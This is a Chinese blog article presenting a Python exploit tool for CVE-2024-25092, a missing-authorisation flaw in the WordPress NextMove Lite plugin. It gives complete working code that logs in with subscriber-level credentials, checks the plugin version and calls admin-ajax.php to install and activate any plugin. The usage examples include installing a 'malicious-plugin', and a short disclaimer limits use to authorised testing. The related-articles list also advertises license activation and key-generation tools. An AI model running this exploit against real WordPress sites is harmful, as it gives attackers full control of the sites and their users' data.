当前位置：首页 > article >正文

WordPress NextMove Lite 插件权限绕过漏洞利用工具 (CVE-2024-25092)

article 2026/4/10 10:20:11

CVE-2024-25092 漏洞利用工具项目描述本项目是针对CVE-2024-25092漏洞的自动化利用脚本。该漏洞存在于 WordPress XLPlugins NextMove Lite 插件版本号 ≤ 2.17.0中由于缺少授权检查导致具有订阅者Subscriber及以上权限的认证用户可以绕过权限限制安装并激活任意 WordPress 插件。成功利用此漏洞可能导致网站完全被控制。属性值漏洞编号CVE-2024-25092公开日期2024-06-09严重程度高危 (CVSS 8.8)漏洞类型CWE-862 - 缺失授权受影响版本n/a 至 2.17.0CVSS 向量:CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H功能特性自动认证登录支持通过用户名和密码登录 WordPress 站点任意插件安装利用漏洞绕过授权限制安装并激活任意 WordPress 插件默认插件支持内置默认插件cart-for-woocommerce支持自定义插件名称会话管理使用requests.Session保持登录状态和 CookieSSL 警告抑制自动禁用不安全的 HTTPS 请求警告安装指南系统要求Python 3.xrequests库安装步骤将脚本保存为CVE-2024-25092.py安装依赖库pipinstallrequests使用说明命令行参数参数简写必填说明--url-u是目标 WordPress 站点 URL--username-un是WordPress 用户名--password-p是用户密码--plugin-pl否要安装的插件 slug默认cart-for-woocommerce基础使用示例# 使用默认插件python CVE-2024-25092.py-uhttp://example.com-unsubscriber_user-puser_password# 指定自定义插件python CVE-2024-25092.py-uhttps://target-site.com-uneditor-ppass123-plmalicious-plugin典型输出Logged in successfully. Site is vulnerable... Exploiting and uploading plugin Plugin cart-for-woocommerce installed and activated successfully.工作流程说明登录阶段向/wp-login.php发送 POST 请求验证用户凭证漏洞利用向/wp-admin/admin-ajax.php发送 POST 请求参数actionxl_addon_installation触发任意插件安装核心代码登录验证模块deflogin(session,url,username,password,user_agent):login_urlurl/wp-login.phpresponsesession.post(login_url,verifyFalse,data{log:username,pwd:password,rememberme:forever,wp-submit:LogIn},headers{User-Agent:user_agent})ifany(wordpress_logged_inincookie.nameforcookieinsession.cookies):print(Logged in successfully.)else:print(Failed to log in.)exit()漏洞版本检测defcheck_version(session,url,user_agent):responsesession.get(version_url,verifyFalse,headers{User-Agent:user_agent})ifresponse.status_code200:ifStable tag: 2.17.0inresponse.text:print(Site is vulnerable... Exploiting and uploading plugin)else:print(Site is not vulnerable.)exit()else:print(Failed to check version.)exit()插件安装利用模块definstall_plugin(session,url,plugin,user_agent):exploit_urlurl/wp-admin/admin-ajax.phpexploit_data{action:xl_addon_installation,xl_slug:plugin,xl_file:/plugin.php}headers{User-Agent:user_agent,Accept:*/*,Accept-Language:en-US,en;q0.5,Accept-Encoding:gzip, deflate, br,Referer:url/wp-admin/admin.php?pagexl-cart,Content-Type:application/x-www-form-urlencoded; charsetUTF-8,X-Requested-With:XMLHttpRequest,Origin:url,Connection:keep-alive,Cookie:; .join([f{cookie.name}{cookie.value}forcookieinsession.cookies])}responsesession.post(exploit_url,dataexploit_data,headersheaders,verifyFalse)ifresponse.status_code200:print(fPlugin {plugin} installed and activated successfully.)else:print(Failed to upload plugin.)主程序入口defmain():parserargparse.ArgumentParser(descriptionExploit script for CVE-2024-25092 By Nxploit Khaled Alenazi. )parser.add_argument(-u,--url,requiredTrue,helpTarget URL)parser.add_argument(-un,--username,requiredTrue,helpUsername)parser.add_argument(-p,--password,requiredTrue,helpPassword)parser.add_argument(-pl,--plugin,defaultcart-for-woocommerce,helpPlugin to install (default: cart-for-woocommerce))argsparser.parse_args()user_agentMozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0requests.packages.urllib3.disable_warnings()sessionrequests.Session()session.verifyFalselogin(session,args.url,args.username,args.password,user_agent)check_version(session,args.url,user_agent)install_plugin(session,args.url,args.plugin,user_agent)if__name____main__:main()免责声明本工具仅限用于授权的安全测试和教育目的。未经授权使用此脚本攻击系统属于违法行为。使用者需自行承担法律责任。6HFtX5dABrKlqXeO5PUv/36QVhA6BltxZzh7R/LTOFg更多精彩内容请关注我的个人公众号公众号办公AI智能小助手对网络安全、黑客技术感兴趣的朋友可以关注我的安全公众号网络安全技术点滴分享

WordPress NextMove Lite 插件权限绕过漏洞利用工具 (CVE-2024-25092)

相关文章：

WordPress NextMove Lite 插件权限绕过漏洞利用工具 (CVE-2024-25092)

免费获取全球900+语言支持的Noto字体库：设计师与开发者的终极解决方案

8大网盘直链解析神器：告别限速，享受极速下载体验

Pixel Mind Decoder 性能调优教程：解决GPU显存不足与推理加速

7天连续挑战：OpenClaw+Qwen3-32B完成100个自动化任务实录

3分钟搞定Jellyfin中文元数据：MetaShark插件全攻略

ThinkPHP 8+CPU的生命周期的庖丁解牛

ThinkPHP 8+ES的生命周期的庖丁解牛

ThinkPHP 8+redis的生命周期的庖丁解牛

用了半年只留下这1个！2026年我亲测好用的视频文案提取网站真的太香了

2026最新！3款亲测搞定音频怎么转换成文字的免费神器，实用必备不踩坑！

3分钟实现Zotero文献PDF自动下载：科研效率的终极革命

基于File-Based App开发MVP项目仿

别再只用Curl了！用libhv的HttpClient类，5分钟搞定C++里的GET/POST请求

Beyond Compare 5密钥生成器：快速激活与完整使用指南

3分钟搞定游戏手柄兼容性：用ViGEmBus让所有手柄在Windows上畅玩

Realistic Vision V5.1效果展示：惊艳写实人像生成案例分享

Vivado IBERT实战：从眼图扫描到误码率分析的链路质量评估

食品商家狂喜：易元AI让你的产品视频“香”到流口水，下单率暴涨

从软体机器人到鞋垫分析：Abaqus超弹性材料(Ogden模型)仿真配置全流程

告别“字符串拼接”：在.NET中用LINQ重塑数据查询

KMS_VL_ALL_AIO：如何用智能激活脚本彻底解决Windows和Office激活难题

KMS_VL_ALL_AIO：Windows与Office智能激活终极指南 - 3分钟解决授权问题

Playwright MCP：重新定义浏览器自动化边界的智能会话桥接方案

告别CAJ格式束缚：caj2pdf开源工具深度解析与实战指南

网盘直链下载助手：八大主流平台一键获取真实下载链接的完整指南

Pixel Dimension Fissioner 版本管理实战：Git协作开发工作流

解耦的艺术：.NET 中依赖注入（DI）的核心原理与实战

三步掌握Ofd2Pdf：OFD转PDF的高效实用指南

Windows窗口管理终极指南：Traymond让系统托盘变身高效收纳站